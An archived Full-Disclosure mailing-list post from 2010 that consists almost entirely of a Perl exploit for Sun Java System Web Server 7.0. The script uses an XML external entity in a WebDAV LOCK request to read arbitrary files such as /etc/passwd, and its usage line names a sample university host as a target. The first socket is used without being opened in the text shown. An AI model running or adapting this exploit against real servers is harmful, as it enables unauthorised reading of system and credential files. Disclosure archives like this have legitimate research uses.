| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <o2g72f8221d1004030606h43163efh1bd64c446d4f0fc8@mail.gmail.com>
Date: Sat, 3 Apr 2010 15:06:08 +0200
From: Kingcope <kcope2@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Sun D3VS SM0KiNG PoT AGAiN
#!/usr/bin/perl
# aN0THER TiP OF THE iCE-B3RG ReMOTE eXPLoiT
# oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
# oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
# oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
# !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
# MAY/2010
# VERY THANKS TO LSD
#
#
# oO VERiFIED oN Oo
#
# SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
SERVER 2008 & SunOS 5.10]
# SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
# [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
# RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
use IO::Socket;
use MIME::Base64;
print "//Sun Microsystems Sun Java System Web Server\n";
print "//Remote File Disclosure Exploit\n";
print "//by Kingcope\n";
print "May/2010\n";
if ($#ARGV != 2) {
print "usage: perl sun.pl <target> <webdav directory> <file to get>\n";
print "sample: perl sun.pl lib7.berkeley.edu /dav /etc/passwd\n";
exit;
}
$target = $ARGV[0];
$|=1;
$remotefile = $ARGV[2];
$folder = $ARGV[1];
$KRADXmL =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";
print $sock "LOCK /$folder HTTP/1.1\r\n".
"Host: $target\r\n".
"Depth: 0\r\n".
"Connection: close\r\n".
"Content-Type: application/xml\r\nContent-Length:
".length($KRADXmL)."\r\n\r\n".
$KRADXmL;
$locktoken = "";
while(<$sock>) {
if ($_ =~ /^Lock-token:\s(.*)?\r/) {
$locktoken = $1;
chomp $locktoken;
}
print;
}
close($sock);
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '8080',
Proto => 'tcp');
print $sock "UNLOCK /$folder HTTP/1.1\r\n".
"Host: $target\r\n".
"Connection: close\r\n".
"Lock-token: $locktoken\r\n\r\n";
while(<$sock>) {
print;
}
close($sock);
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists